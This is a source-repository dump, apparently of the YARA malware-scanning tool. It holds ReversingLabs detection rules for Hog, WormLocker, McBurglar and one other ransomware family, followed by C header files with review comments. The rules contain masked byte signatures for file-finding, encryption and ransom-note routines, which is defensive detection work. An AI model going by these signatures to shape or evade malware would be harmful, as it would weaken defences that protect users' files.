24 | 83 C4 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
25 | E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
26 | B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50
27 | 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
28 | E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
29 | ?? ?? B8 ?? ?? ?? ?? C9 C3
30 | }
31 |
32 | $encrypt_files = {
33 | 55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ??
83 C4 ?? 34 | 89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? 35 | ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 36 | ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 37 | 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 40 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 38 | 89 45 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 39 | ?? B8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 39 C8 0F 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? 40 | 8B 45 ?? 89 C1 40 89 45 ?? EB ?? 8B 45 ?? 8B 4D ?? 01 C1 8B 45 ?? 8B 55 ?? 01 C2 8B 41 | 45 ?? 50 89 4D ?? 89 55 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 31 D2 42 | F7 F1 8B 45 ?? 01 D0 8B 4D ?? 0F BE 09 0F BE 10 31 D1 8B 45 ?? 88 08 EB ?? B8 ?? ?? 43 | ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 B9 ?? ?? ?? ?? 51 50 E8 ?? 44 | ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? 45 | ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C9 C3 46 | } 47 | 48 | $drop_ransom_note = { 49 | 55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 | 89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? 51 | ?? ?? B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 50 B8 ?? ?? ?? ?? 50 B8 52 | ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? 53 | ?? ?? 
C9 C3 54 | } 55 | 56 | condition: 57 | uint16(0) == 0x5A4D and 58 | ( 59 | ( 60 | $find_files 61 | ) and 62 | ( 63 | $encrypt_files 64 | ) and 65 | ( 66 | $drop_ransom_note 67 | ) 68 | ) 69 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Hog.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Hog : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "HOG" 12 | description = "Yara rule that detects Hog ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Hog" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $generate_key = { 21 | 73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 1A 8D ?? ?? ?? ?? 0C 2B ?? 07 08 6F ?? ?? ?? ?? 08 22 | 16 28 ?? ?? ?? ?? 0D 06 72 ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 5E 28 ?? ?? ?? 23 | ?? 6F ?? ?? ?? ?? 26 02 25 17 59 10 ?? 16 30 ?? 06 6F ?? ?? ?? ?? 13 ?? DE ?? 07 2C ?? 24 | 07 6F ?? ?? ?? ?? DC 11 ?? 2A 25 | } 26 | 27 | $find_files = { 28 | 16 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 16 16 6F ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 00 1F 29 | ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? 30 | ?? ?? 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 31 | 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 7E ?? 32 | ?? ?? ?? 6F ?? ?? ?? ?? 17 31 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? 33 | ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 34 | 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F ?? 35 | ?? ?? ?? DC 28 ?? ?? ?? ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 26 28 ?? ?? ?? ?? 36 | DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? 
DC 2A 37 | } 38 | 39 | $encrypt_files_p1 = { 40 | 02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? 41 | ?? ?? ?? 31 ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? 42 | ?? ?? ?? 06 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 19 43 | 73 ?? ?? ?? ?? 0B 02 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ?? 44 | ?? 17 73 ?? ?? ?? ?? 0D 08 06 6F ?? ?? ?? ?? 16 06 6F ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? 45 | 07 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC DE ?? 08 2C ?? 08 6F ?? ?? ?? 46 | ?? DC DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 02 28 ?? 47 | ?? ?? ?? DE ?? 26 DE ?? 2A 48 | } 49 | 50 | $encrypt_files_p2 = { 51 | 73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 8D ?? ?? ?? 52 | ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0B 53 | 73 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 0D 09 07 16 07 8E 69 6F ?? ?? 54 | ?? ?? 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 28 ?? ?? 55 | ?? ?? 10 ?? DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 02 13 ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? 56 | ?? DC 26 DE ?? 02 2A 11 ?? 2A 57 | } 58 | 59 | condition: 60 | uint16(0) == 0x5A4D and 61 | ( 62 | $find_files 63 | ) and 64 | ( 65 | $generate_key 66 | ) and 67 | ( 68 | all of ($encrypt_files_p*) 69 | ) 70 | } -------------------------------------------------------------------------------- /src/lib/hex_grammar.h: -------------------------------------------------------------------------------- 1 | /* A Bison parser, made by GNU Bison 3.8.2. */ 2 | 3 | /* Bison interface for Yacc-like parsers in C 4 | 5 | Copyright (C) 1984, 1989-1990, 2000-2015, 2018-2021 Free Software Foundation, 6 | Inc. 
7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | This program is distributed in the hope that it will be useful, 14 | but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | GNU General Public License for more details. 17 | 18 | You should have received a copy of the GNU General Public License 19 | along with this program. If not, see . */ 20 | 21 | /* As a special exception, you may create a larger work that contains 22 | part or all of the Bison parser skeleton and distribute that work 23 | under terms of your choice, so long as that work isn't itself a 24 | parser generator using the skeleton or a modified version thereof 25 | as a parser skeleton. Alternatively, if you modify or redistribute 26 | the parser skeleton itself, you may (at your option) remove this 27 | special exception, which will cause the skeleton and the resulting 28 | Bison output files to be licensed under the GNU General Public 29 | License without this special exception. 30 | 31 | This special exception was added by the Free Software Foundation in 32 | version 2.2 of Bison. */ 33 | 34 | /* DO NOT RELY ON FEATURES THAT ARE NOT DOCUMENTED in the manual, 35 | especially those whose name start with YY_ or yy_. They are 36 | private implementation details that can be changed or removed. */ 37 | 38 | #ifndef YY_HEX_YY_HEX_GRAMMAR_H_INCLUDED 39 | # define YY_HEX_YY_HEX_GRAMMAR_H_INCLUDED 40 | /* Debug traces. */ 41 | #ifndef YYDEBUG 42 | # define YYDEBUG 0 43 | #endif 44 | #if YYDEBUG 45 | extern int hex_yydebug; 46 | #endif 47 | 48 | /* Token kinds. 
*/ 49 | #ifndef YYTOKENTYPE 50 | # define YYTOKENTYPE 51 | enum yytokentype 52 | { 53 | YYEMPTY = -2, 54 | YYEOF = 0, /* "end of file" */ 55 | YYerror = 256, /* error */ 56 | YYUNDEF = 257, /* "invalid token" */ 57 | _BYTE_ = 258, /* _BYTE_ */ 58 | _MASKED_BYTE_ = 259, /* _MASKED_BYTE_ */ 59 | _NOT_BYTE_ = 260, /* _NOT_BYTE_ */ 60 | _MASKED_NOT_BYTE_ = 261, /* _MASKED_NOT_BYTE_ */ 61 | _NUMBER_ = 262 /* _NUMBER_ */ 62 | }; 63 | typedef enum yytokentype yytoken_kind_t; 64 | #endif 65 | /* Token kinds. */ 66 | #define YYEMPTY -2 67 | #define YYEOF 0 68 | #define YYerror 256 69 | #define YYUNDEF 257 70 | #define _BYTE_ 258 71 | #define _MASKED_BYTE_ 259 72 | #define _NOT_BYTE_ 260 73 | #define _MASKED_NOT_BYTE_ 261 74 | #define _NUMBER_ 262 75 | 76 | /* Value type. */ 77 | #if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED 78 | union YYSTYPE 79 | { 80 | #line 78 "hex_grammar.y" 81 | 82 | int64_t integer; 83 | RE_NODE *re_node; 84 | 85 | #line 86 "hex_grammar.h" 86 | 87 | }; 88 | typedef union YYSTYPE YYSTYPE; 89 | # define YYSTYPE_IS_TRIVIAL 1 90 | # define YYSTYPE_IS_DECLARED 1 91 | #endif 92 | 93 | 94 | 95 | 96 | int hex_yyparse (void *yyscanner, HEX_LEX_ENVIRONMENT *lex_env); 97 | 98 | 99 | #endif /* !YY_HEX_YY_HEX_GRAMMAR_H_INCLUDED */ 100 | -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.WormLocker.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_WormLocker : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "WORMLOCKER" 12 | description = "Yara rule that detects WormLocker ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "WormLocker" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $set_environment = { 21 | 73 ?? ?? ?? ?? 
0A 06 02 7D ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? 22 | ?? ?? 0C 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 02 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 73 ?? ?? 23 | ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? 24 | ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? 25 | ?? ?? 28 ?? ?? ?? ?? 00 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 | 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? 27 | ?? ?? 6F ?? ?? ?? ?? 00 06 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 20 ?? ?? ?? 28 | ?? 6F ?? ?? ?? ?? 00 13 ?? 11 ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 29 | 11 ?? 17 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2A 30 | } 31 | 32 | $find_files = { 33 | 00 28 ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? 34 | ?? ?? 28 ?? ?? ?? ?? 0C 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? 35 | ?? 0D 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 73 ?? ?? 36 | ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 00 11 ?? 09 11 ?? 9A 11 ?? 6F ?? ?? ?? 37 | ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 09 8E 69 FE 04 13 ?? 11 ?? 2D ?? 16 13 ?? 2B ?? 00 11 38 | ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 39 | 13 ?? 11 ?? 2D ?? 2A 40 | } 41 | 42 | $encrypt_files_p1 = { 43 | 00 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73 44 | ?? ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 45 | 00 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? 46 | ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 47 | 00 09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16 48 | 02 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? 49 | ?? ?? 
00 DC 08 6F ?? ?? ?? ?? 0A 00 DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? 00 DC 00 DE ?? 08 50 | 2C ?? 08 6F ?? ?? ?? ?? 00 DC 06 13 ?? 2B ?? 11 ?? 2A 51 | } 52 | 53 | $encrypt_files_p2 = { 54 | 00 03 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 6F ?? ?? 55 | ?? ?? 0B 06 07 28 ?? ?? ?? ?? 0C 03 0D 09 08 28 ?? ?? ?? ?? 00 2A 56 | } 57 | 58 | condition: 59 | uint16(0) == 0x5A4D and 60 | ( 61 | $set_environment 62 | ) and 63 | ( 64 | $find_files 65 | ) and 66 | ( 67 | all of ($encrypt_files_p*) 68 | ) 69 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.McBurglar.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_McBurglar : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "MCBURGLAR" 12 | description = "Yara rule that detects McBurglar ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "McBurglar" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $setup_env = { 21 | 00 7E ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? 22 | ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? 23 | ?? 1B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? 24 | ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 28 ?? ?? 25 | ?? ?? 00 2A 26 | } 27 | 28 | $encrypt_files_p1 = { 29 | 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 73 ?? ?? ?? ?? 0B 07 12 ?? 28 ?? ?? ?? ?? 30 | 7D ?? ?? ?? ?? 00 07 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 31 | 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A 32 | } 33 | 34 | $encrypt_files_p2 = { 35 | 00 28 ?? ?? ?? ?? 0A 02 72 ?? ?? ?? 
?? 28 ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? 36 | ?? 0C 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 6F 37 | ?? ?? ?? ?? 00 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 18 6F ?? ?? ?? ?? 00 09 06 38 | 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? 39 | ?? 6F ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? 40 | ?? 00 11 ?? 1A 6F ?? ?? ?? ?? 00 07 06 16 06 8E 69 6F ?? ?? ?? ?? 00 07 11 ?? 6F ?? ?? 41 | ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 42 | 13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 43 | 6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 44 | ?? 00 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE 45 | ?? 00 11 ?? 6F ?? ?? ?? ?? 00 07 6F ?? ?? ?? ?? 00 00 DC 2A 46 | } 47 | 48 | $find_files = { 49 | 00 00 02 28 ?? ?? ?? ?? 0A 00 06 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ?? 50 | 00 00 09 17 58 0D 09 08 8E 69 32 ?? 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 2B ?? 11 51 | ?? 11 ?? 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 52 | ?? 00 DE ?? 26 00 00 DE ?? 2A 53 | } 54 | 55 | $generate_salt = { 56 | 00 1F ?? 8D ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 00 16 0C 2B ?? 00 07 06 6F ?? ?? ?? ?? 00 57 | 00 08 17 58 0C 08 1F ?? FE 04 0D 09 2D ?? 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 06 58 | 13 ?? 2B ?? 11 ?? 2A 59 | } 60 | 61 | condition: 62 | uint16(0) == 0x5A4D and 63 | ( 64 | $setup_env 65 | ) and 66 | ( 67 | $find_files 68 | ) and 69 | ( 70 | $generate_salt 71 | ) and 72 | ( 73 | all of ($encrypt_files_p*) 74 | ) 75 | } -------------------------------------------------------------------------------- /src/lib/include/yara/strutils.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007-2014. 
The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
28 | */
29 |
30 | #ifndef YR_STRUTILS_H
31 | #define YR_STRUTILS_H
32 |
// NOTE(review): the header names after these #include directives were lost in
// extraction and are not reconstructed here.
33 | #include
34 | #include
35 | #include
36 | #include
37 | #include
38 |
// On Windows supply the PRI* format macros in MSVC's I64/I32 spelling when the
// toolchain does not define them; elsewhere the system header (whose name was
// also lost above) provides them.
39 | #if defined(_WIN32)
40 |
41 | #if !defined(PRIu64)
42 | #define PRIu64 "I64u"
43 | #endif
44 |
45 | #if !defined(PRIu32)
46 | #define PRIu32 "I32u"
47 | #endif
48 |
49 | #if !defined(PRIx64)
50 | #define PRIx64 "I64x"
51 | #endif
52 |
53 | #if !defined(PRId64)
54 | #define PRId64 "I64d"
55 | #endif
56 |
57 | #if !defined(PRIi32)
58 | #define PRIi32 "I32i"
59 | #endif
60 |
61 | #if !defined(PRIi64)
62 | #define PRIi64 "I64i"
63 | #endif
64 |
65 | #if !defined(PRIo64)
66 | #define PRIo64 "I64o"
67 | #endif
68 |
69 | #else
70 | #include
71 | #endif
72 |
73 | // Cygwin already has these functions.
74 | #if defined(_WIN32) && !defined(__CYGWIN__)
75 | #if defined(_MSC_VER) && _MSC_VER < 1900
76 |
// Caveat for the pre-VS2015 fallback: _snprintf does not NUL-terminate the
// buffer when the output is truncated and returns a negative value instead of
// the would-be length, unlike C99 snprintf. Callers that assume C99 semantics
// (bounded and always terminated) must terminate the buffer themselves on
// that toolchain.
77 | #if !defined(snprintf)
78 | #define snprintf _snprintf
79 | #endif
80 |
81 | #endif
82 | #define strcasecmp _stricmp
83 | #define strncasecmp _strnicmp
84 | #endif
85 |
// Parses a hexadecimal string into a uint64_t. The prototype offers no error
// channel, so how invalid digits or overflow are handled is decided in the .c.
86 | uint64_t xtoi(const char* hexstr);
87 |
// Prototypes for the BSD-style bounded copy / concatenate functions, declared
// only where the platform lacks them. Under that contract the destination is
// always NUL-terminated (for size > 0) and the return value is the length the
// call tried to produce, so `ret >= size` signals truncation.
88 | #if !HAVE_STRLCPY && !defined(strlcpy)
89 | size_t strlcpy(char* dst, const char* src, size_t size);
90 | #endif
91 |
92 | #if !HAVE_STRLCAT && !defined(strlcat)
93 | size_t strlcat(char* dst, const char* src, size_t size);
94 | #endif
95 |
// Fallback memmem: locate `needle` inside `haystack`; both are explicitly
// sized, so neither needs to be NUL-terminated.
96 | #if !HAVE_MEMMEM && !defined(memmem)
97 | void* memmem(
98 | const void* haystack,
99 | size_t haystack_size,
100 | const void* needle,
101 | size_t needle_size);
102 | #endif
103 |
// The `_w` variants take a `char*` to what is presumably a two-byte (UTF-16LE)
// "wide" string — confirm the encoding against strutils.c. Note that
// strnlen_w returns int while strlcpy_w follows the size_t convention.
104 | int strnlen_w(const char* w_str);
105 |
106 | int strcmp_w(const char* w_str, const char* str);
107 |
108 | size_t strlcpy_w(char* dst, const char* w_src, size_t n);
109 |
// NOTE(review): the include guard closes here, so the three prototypes below
// sit outside it. Identical redeclaration of a prototype is legal C, which is
// why double inclusion does not break today, but anything other than a plain
// declaration added after this point would.
110 | #endif
111 |
112 | int yr_isalnum(const uint8_t* s);
113 |
// asprintf-style formatting into a freshly allocated string stored in *strp
// (ownership presumably passes to the caller, who frees it — confirm in the
// .c). Both return void, so an allocation failure cannot be reported through
// the return value.
114 | void yr_vasprintf(char** strp, const char* fmt, va_list ap);
115 |
116 | void yr_asprintf(char** strp, const char* fmt, ...);
117 |
-------------------------------------------------------------------------------- /src/lib/include/yara/dex.h:
--------------------------------------------------------------------------------
// NOTE(review): `_DEX_H` (and the `struct _DEX` tag below) start with an
// underscore followed by an uppercase letter, a form C reserves for the
// implementation; a project prefix such as YR_DEX_H would avoid the clash.
1 | #ifndef _DEX_H
2 | #define _DEX_H
3 |
// NOTE(review): the header names after these #include directives were lost in
// extraction and are not reconstructed here.
4 | #include
5 | #include
6 | #include
7 |
// DEX magic: "dex\n" + three-digit format version + NUL, one string per
// version this parser recognises.
8 | #define DEX_FILE_MAGIC_035 "dex\n035\x00"
9 | #define DEX_FILE_MAGIC_036 "dex\n036\x00"
10 | #define DEX_FILE_MAGIC_037 "dex\n037\x00"
11 | #define DEX_FILE_MAGIC_038 "dex\n038\x00"
12 | #define DEX_FILE_MAGIC_039 "dex\n039\x00"
13 |
// Byte-packed so the structs can be laid directly over file bytes at
// arbitrary offsets (see fits_in_dex below). The pack region also covers the
// DEX parser-state struct and the macros.
14 | #pragma pack(push, 1)
15 |
// Fixed-size DEX file header. Every *_size / *_offset pair is read from the
// file and is therefore untrusted: range-check each against `data_size`
// before dereferencing (fits_in_dex exists for exactly that).
16 | typedef struct
17 | {
18 | uint8_t magic[8];
19 | uint32_t checksum;
20 | uint8_t signature[20];
21 | uint32_t file_size;
22 | uint32_t header_size;
23 | uint32_t endian_tag;
24 | uint32_t link_size;
25 | uint32_t link_offset;
